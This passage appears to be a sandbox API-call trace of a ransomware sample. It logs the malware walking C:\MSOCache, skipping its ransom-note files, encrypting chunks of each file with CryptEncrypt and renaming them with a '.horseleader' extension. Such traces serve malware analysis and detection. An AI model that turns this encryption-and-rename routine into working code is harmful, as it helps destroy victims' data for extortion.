dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0222.259] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0222.259] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C") returned 66 [0222.259] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0222.259] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0222.259] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0222.259] GetProcessHeap () returned 0x780000 [0222.259] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0222.259] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*") returned 68 [0222.259] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0222.410] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0222.410] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.") returned 68 [0222.410] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0222.410] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0222.410] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0222.410] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0222.410] lstrlenW (lpString=".testttjffg") returned 11 [0222.410] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0222.410] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.410] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.410] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0222.410] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0222.410] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0222.410] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\..") returned 69 [0222.411] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0222.411] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0222.411] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0222.411] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0222.411] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0222.411] lstrlenW (lpString=".testttjffg") returned 11 [0222.411] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0222.411] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.411] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.411] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0222.411] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0222.411] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0222.411] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0222.411] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".horseleader") returned 0x0 [0222.411] lstrcmpW (lpString1="Office32WW.msi", lpString2="#Decrypt#.txt") returned 1 [0222.411] lstrcmpW (lpString1="Office32WW.msi", lpString2="_uninstalling_.png") returned 1 [0222.411] lstrlenW (lpString=".testttjffg") returned 11 [0222.411] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpSrch=".testttjffg") returned 0x0 [0222.412] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.412] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.412] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.412] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0222.412] StrStrW (lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0222.412] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1992192) returned 1 [0222.412] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.413] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.419] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.419] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.419] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf0b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.419] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.427] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.428] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.428] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1e1600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.428] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.431] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.431] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.432] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.432] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.432] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.432] CloseHandle (hObject=0x21c) returned 1 [0222.432] GetProcessHeap () returned 0x780000 [0222.433] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.433] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader") returned 93 [0222.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.horseleader")) returned 1 [0222.434] GetProcessHeap () returned 0x780000 [0222.434] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.434] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0222.434] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0222.434] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0222.434] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".horseleader") returned 0x0 [0222.434] lstrcmpW (lpString1="Office32WW.xml", lpString2="#Decrypt#.txt") returned 1 [0222.434] lstrcmpW (lpString1="Office32WW.xml", lpString2="_uninstalling_.png") returned 1 [0222.434] lstrlenW (lpString=".testttjffg") returned 11 [0222.434] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpSrch=".testttjffg") returned 0x0 [0222.434] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.434] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.434] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.435] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0222.435] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0222.435] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=4274) returned 1 [0222.435] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0222.437] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.437] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0222.437] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.438] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.438] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.438] CloseHandle (hObject=0x21c) returned 1 [0222.438] GetProcessHeap () returned 0x780000 [0222.438] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.438] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader") returned 93 [0222.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.horseleader")) returned 1 [0222.439] GetProcessHeap () returned 0x780000 [0222.439] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.439] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec54b6b0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xec54b6b0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x4a687710, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0222.439] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0222.439] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0222.439] StrStrIW (lpFirst="ose.exe", lpSrch=".horseleader") returned 0x0 [0222.440] lstrcmpW (lpString1="ose.exe", lpString2="#Decrypt#.txt") returned 1 [0222.440] lstrcmpW (lpString1="ose.exe", lpString2="_uninstalling_.png") returned 1 [0222.440] lstrlenW (lpString=".testttjffg") returned 11 [0222.440] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe", lpSrch=".testttjffg") returned 0x0 [0222.440] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.440] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.440] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.452] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0222.452] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0222.452] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=174440) returned 1 [0222.452] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.452] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.460] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.460] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.460] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12cb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.460] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.462] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.462] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.462] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25968, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.462] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.464] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.464] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.464] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.464] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.464] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.464] CloseHandle (hObject=0x21c) returned 1 [0222.465] GetProcessHeap () returned 0x780000 [0222.465] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.465] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader") returned 86 [0222.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.horseleader")) returned 1 [0222.466] GetProcessHeap () returned 0x780000 [0222.466] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.466] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde72fbf0, ftCreationTime.dwHighDateTime=0x1cb0d0b, ftLastAccessTime.dwLowDateTime=0xde72fbf0, ftLastAccessTime.dwHighDateTime=0x1cb0d0b, ftLastWriteTime.dwLowDateTime=0x49c902c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0222.466] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0222.466] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0222.466] StrStrIW (lpFirst="osetup.dll", lpSrch=".horseleader") returned 0x0 [0222.466] lstrcmpW (lpString1="osetup.dll", lpString2="#Decrypt#.txt") returned 1 [0222.466] lstrcmpW (lpString1="osetup.dll", lpString2="_uninstalling_.png") returned 1 [0222.466] lstrlenW (lpString=".testttjffg") returned 11 [0222.741] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll", lpSrch=".testttjffg") returned 0x0 [0222.742] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.742] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.742] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.745] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0222.746] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0222.746] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=7378792) returned 1 [0222.746] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.746] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, 